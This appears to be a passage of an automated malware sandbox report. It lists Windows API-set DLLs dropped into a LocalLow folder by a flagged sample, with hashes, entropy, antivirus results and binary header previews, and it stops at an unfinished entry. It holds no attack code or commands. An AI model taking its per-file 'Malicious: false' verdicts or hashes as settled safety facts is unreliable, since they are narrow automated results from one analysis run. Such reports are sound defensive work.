SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Download File
